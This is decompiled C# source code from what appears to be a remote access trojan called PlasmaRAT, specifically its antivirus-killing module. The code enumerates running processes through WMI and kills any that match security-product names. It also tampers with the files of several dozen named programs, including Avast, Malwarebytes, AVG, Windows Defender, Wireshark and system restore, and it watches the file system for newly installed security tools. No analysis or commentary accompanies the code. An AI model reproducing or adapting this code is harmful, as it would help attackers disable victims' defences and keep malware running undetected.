// Token: 0x0600004E RID: 78 RVA: 0x00005508 File Offset: 0x00003708 public static bool CheckProcess(string location) { bool result; try { string[] array = Strings.Split(AVKill.SearchStrings, " ", -1, CompareMethod.Binary); string text = Strings.StrConv(location.ToString(), VbStrConv.Lowercase, 0); foreach (string value in array) { try { if (text.Contains(value)) { AVKill.FuckFileName(location.ToString()); BotKillers.KillFile(location.ToString()); result = true; break; } } catch (Exception ex) { } } } catch (Exception ex2) { } return(result); }
// Token: 0x0600004B RID: 75 RVA: 0x00005120 File Offset: 0x00003320 public static void Start() { try { if (!AntiEverything.IsAdmin()) { CheckAV.RunAVAdminMode(); } else { AVKill.searchav(Environment.GetEnvironmentVariable("PROGRAMDATA")); AVKill.ProtectMyFile(); AVKill.searchav(Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles)); AVKill.AVProcSearcher(); AVKill.FuckFileName("rstrui.exe"); AVKill.FuckFileName("AvastSvc.exe"); AVKill.FuckFileName("avconfig.exe"); AVKill.FuckFileName("AvastUI.exe"); AVKill.FuckFileName("avscan.exe"); AVKill.FuckFileName("instup.exe"); AVKill.FuckFileName("mbam.exe"); AVKill.FuckFileName("mbamgui.exe"); AVKill.FuckFileName("mbampt.exe"); AVKill.FuckFileName("mbamscheduler.exe"); AVKill.FuckFileName("mbamservice.exe"); AVKill.FuckFileName("hijackthis.exe"); AVKill.FuckFileName("spybotsd.exe"); AVKill.FuckFileName("ccuac.exe"); AVKill.FuckFileName("avcenter.exe"); AVKill.FuckFileName("avguard.exe"); AVKill.FuckFileName("avgnt.exe"); AVKill.FuckFileName("avgui.exe"); AVKill.FuckFileName("avgcsrvx.exe"); AVKill.FuckFileName("avgidsagent.exe"); AVKill.FuckFileName("avgrsx.exe"); AVKill.FuckFileName("avgwdsvc.exe"); AVKill.FuckFileName("egui.exe"); AVKill.FuckFileName("zlclient.exe"); AVKill.FuckFileName("bdagent.exe"); AVKill.FuckFileName("keyscrambler.exe"); AVKill.FuckFileName("avp.exe"); AVKill.FuckFileName("wireshark.exe"); AVKill.FuckFileName("ComboFix.exe"); AVKill.FuckFileName("MSASCui.exe"); AVKill.FuckFileName("MpCmdRun.exe"); AVKill.FuckFileName("msseces.exe"); AVKill.FuckFileName("MsMpEng.exe"); AVKill.FuckFileName("blindman.exe"); AVKill.FuckFileName("SDFiles.exe"); AVKill.FuckFileName("SDMain.exe"); AVKill.FuckFileName("SDWinSec.exe"); } } catch (Exception ex) { } }
// Token: 0x0600004F RID: 79 RVA: 0x000055B0 File Offset: 0x000037B0 public static void AVProcSearcher() { try { string value = "Program Files"; try { foreach (object obj in ((IEnumerable)NewLateBinding.LateGet(Interaction.GetObject("winmgmts:", null), null, "ExecQuery", new object[] { "Select * from Win32_Process" }, null, null, null))) { object objectValue = RuntimeHelpers.GetObjectValue(obj); if ((NewLateBinding.LateGet(objectValue, null, "ExecutablePath", new object[0], null, null, null).ToString().Contains(value) | NewLateBinding.LateGet(objectValue, null, "ExecutablePath", new object[0], null, null, null).ToString().Contains("ProgramData")) && !NewLateBinding.LateGet(objectValue, null, "executablepath", new object[0], null, null, null).ToString().Contains(PlasmaRAT.InstallationOfEverything) && Operators.CompareString(NewLateBinding.LateGet(objectValue, null, "executablepath", new object[0], null, null, null).ToString(), Application.ExecutablePath, false) != 0) { try { try { if (AVKill.CheckProcess(Conversions.ToString(NewLateBinding.LateGet(objectValue, null, "ExecutablePath", new object[0], null, null, null)))) { Process.GetProcessById(Conversions.ToInteger(NewLateBinding.LateGet(objectValue, null, "ProcessID", new object[0], null, null, null))).Kill(); } } catch (Exception ex) { } } catch (Exception ex2) { } } } } finally { IEnumerator enumerator; if (enumerator is IDisposable) { (enumerator as IDisposable).Dispose(); } } } catch (Exception ex3) { } }
// Token: 0x0600004A RID: 74 RVA: 0x0000508C File Offset: 0x0000328C private static void FileSystemWatcher1_Created(object sender, FileSystemEventArgs e) { int num; int num4; object obj; try { IL_00: ProjectData.ClearProjectError(); num = 1; IL_07: int num2 = 2; AVKill.CheckFileforAV(e.FullPath); IL_14: goto IL_6F; IL_16: int num3 = num4 + 1; num4 = 0; @switch(ICSharpCode.Decompiler.ILAst.ILLabel[], num3); IL_30: goto IL_64; IL_32: num4 = num2; @switch(ICSharpCode.Decompiler.ILAst.ILLabel[], num); IL_42 :; } catch when(endfilter(obj is Exception & num != 0 & num4 == 0)) { Exception ex = (Exception)obj2; goto IL_32; } IL_64: throw ProjectData.CreateProjectError(-2146828237); IL_6F: if (num4 != 0) { ProjectData.ClearProjectError(); } }